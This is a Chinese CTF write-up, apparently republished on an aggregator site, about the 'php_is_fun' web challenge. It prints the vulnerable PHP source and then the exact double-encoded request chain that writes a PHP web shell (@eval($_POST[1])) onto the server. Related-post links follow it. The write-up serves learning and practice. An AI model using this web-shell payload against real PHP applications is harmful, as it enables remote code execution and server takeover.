WEB 杂记
来源:互联网 发布:商城二次开发 php 编辑:程序博客网 时间:2024/06/06 13:16
- php_is_fun
把早期的web题刷一刷,把其中一些比较好的给记录下来以便整理、学习
1. php_is_fun
第七季极客大挑战
<?phpif(isset($_GET) && !empty($_GET)){ $url = $_GET['file']; $path = "upload/".$_GET['path'];}else{ show_source(__FILE__); exit();}if(strpos($path,'..') > -1){ die('SYCwaf!');}if(strpos($url,'http://127.0.0.1/') === 0){ file_put_contents($path, file_get_contents($url)); echo "console.log($path update successed!)";}else{ echo "Hello.Geeker";}
题目分析:
我们,整个题目的输入只有两个地方path
和file
我们要构造的payload也只能从这两个地方传入。两个参数的作用很简单这里就不说了。
我们的目的是将我的文件内容写入文件,发现了他会把path打印出来
因此我们想到利用二次传参,第一层将我们要写的内容打印出来,第二层将打印的内容写入文件 http://127.0.0.1/2.php?path=%3C?php%20@eval($_POST[1]);?%3E&file=http://127.0.0.1/
http://127.0.0.1/2.php?path=jj.php&file=http://127.0.0.1/2.php?path=%3C?php%20@eval($_POST[1]);?%3E&file=http://127.0.0.1/
注意二次编码
最后提交 http://127.0.0.1/2.php?path=aaz.php&file=http://127.0.0.1/2.php?path=%253C%253Fphp%2520@eval%2528%2524_POST%255B1%255D%2529%253B%253F%253E%26file=http://127.0.0.1/
然后访问aaz.php
0 0
- web杂记
- WEB 杂记
- web杂记
- web杂记
- Java-Web应用杂记
- 学习Web Service杂记
- web php 杂记
- web前端杂记
- java web 学习杂记
- 杂记ant Java web Start
- web前端动效杂记
- Web工作杂记(一)
- web管理后台程序开发的杂记
- [近日杂记] WEB 与手机应用
- WEB服务器应用开发每天杂记
- Web.config杂记(随时更新)
- web 杂记(input(checked) layer.confirm)
- 杂记
- JAVA设计模式-模板方法模式
- 数字图像处理实验(5):PROJECT 04-01 [Multiple Uses],Two-Dimensional Fast Fourier Transform
- Java内部类探讨
- 基于 dpdk-nginx 的 c1000k 并发研发
- 第一次苏嵌上课
- WEB 杂记
- 基于Hexo+GitHub Pages+独立域名 搭建博客详细教程
- Android应用开发入门经典学习笔记07--activity和fragment
- IKAnalyzer配置扩展词库经验总结
- “音之国度”游戏UI界面分析(一级界面)
- 学习笔记| AS入门(三) 布局篇
- 特种兵数据库手抄
- CNN中使用SVM进行分类(keras的实现)
- Unity MMO游戏架构设计之角色设计二